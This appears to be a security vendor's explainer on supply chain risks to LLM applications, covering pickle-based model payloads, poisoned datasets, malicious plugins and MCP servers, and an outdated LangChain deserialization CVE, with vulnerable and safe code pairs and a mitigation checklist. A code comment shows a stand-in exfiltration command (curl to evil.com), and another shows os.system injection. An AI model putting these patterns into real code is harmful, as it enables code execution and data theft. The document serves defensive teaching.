LLM05: Supply Chain Vulnerabilities

Verified by Precogs Threat Research

LLM supply chain vulnerabilities encompass risks from compromised model weights, poisoned pre-trained models on public repositories, malicious fine-tuning datasets, vulnerable LLM framework dependencies, and insecure plugins/extensions. Unlike traditional software supply chain attacks, LLM supply chain attacks can compromise the model's behavior without changing any application code.

Model Supply Chain Risks

The LLM supply chain has unique risks beyond traditional software: (1) Pre-trained model weights on HuggingFace Hub can contain serialized Python objects (pickle) that execute arbitrary code on load. (2) Fine-tuning datasets from public sources can be poisoned. (3) LoRA adapters and model merges can introduce subtle backdoors. (4) GGUF/GGML quantized models can differ from the original in ways that aren't detectable by comparing outputs on test cases.

Plugin and Extension Risks

LLM applications increasingly use plugins (ChatGPT Plugins, MCP servers, LangChain tools) that extend the model's capabilities. Malicious plugins can exfiltrate data from the conversation, execute arbitrary code on the host system, or manipulate the model's behavior through tool response injection. The MCP ecosystem is particularly vulnerable because servers run with the same privileges as the host application.

Framework Dependency Risks

LLM frameworks (LangChain, LlamaIndex, Transformers) are complex software with frequent CVEs. LangChain alone has had multiple critical deserialization vulnerabilities. A compromised transitive dependency can affect every application using the framework.

⚔️ Attack Examples & Code Patterns

Malicious model with pickle exploit

A HuggingFace model that executes code when loaded:

# ❌ VULNERABLE — loading unverified model with pickle
from transformers import AutoModel
# This model contains a crafted pickle payload
model = AutoModel.from_pretrained("random-user/helpful-model")
# On load, pickle.loads() executes: os.system("curl evil.com/steal")

# ✅ SAFE — use safetensors format, verify checksums
from transformers import AutoModel
model = AutoModel.from_pretrained(
    "verified-org/model",
    use_safetensors=True,     # No code execution risk
    revision="abc123def",     # Pin to specific commit
    token=os.getenv("HF_TOKEN")
)

Compromised LangChain dependency

Outdated LangChain version with known deserialization CVE:

# ❌ VULNERABLE — old LangChain with CVE-2023-36188
# langchain==0.0.171 allows arbitrary code execution
# via crafted serialized chain
from langchain import load_chain
chain = load_chain("malicious_chain.json")
# Executes arbitrary Python via __import__('os').system(...)

# ✅ SAFE — updated version with security patches
# langchain>=0.1.0 disables dangerous deserialization
# requirements.txt:
# langchain>=0.1.0
# langchain-community>=0.1.0

🔍 Detection Checklist

  • Inventory all AI models, adapters, and quantized variants in use (AI-BOM)
  • Verify model checksums match trusted source (HuggingFace commit hash)
  • Prefer safetensors format over pickle-based formats (bin, pt)
  • Audit LLM framework dependencies for known CVEs weekly
  • Review MCP servers and plugins before installation
  • Monitor for unexpected model behavior changes after updates

🛡️ Mitigation Strategy

Verify model checksums and signatures before deployment. Use only models from trusted sources with known provenance. Pin dependency versions for LLM frameworks. Audit third-party plugins and MCP servers before installation. Maintain an AI Bill of Materials (AI-BOM) for all model components.

🛡️

How Precogs AI Protects You

Precogs AI Binary SAST compares binary and model signatures against known-good builds to detect supply chain tampering. It scans LLM framework dependencies for CVEs and identifies compromised model files in your artifact pipeline.

Start Free Scan

What are LLM supply chain vulnerabilities?

LLM supply chain attacks compromise model weights, fine-tuning datasets, framework dependencies, or plugins rather than application code. Risks include pickle-based code execution in model files, poisoned training data, and vulnerable LLM framework versions. Prevention requires model verification, AI-BOM tracking, and safetensors format usage.

Protect Against LLM05: Supply Chain Vulnerabilities

Precogs AI automatically detects llm05: supply chain vulnerabilities vulnerabilities and generates AutoFix PRs.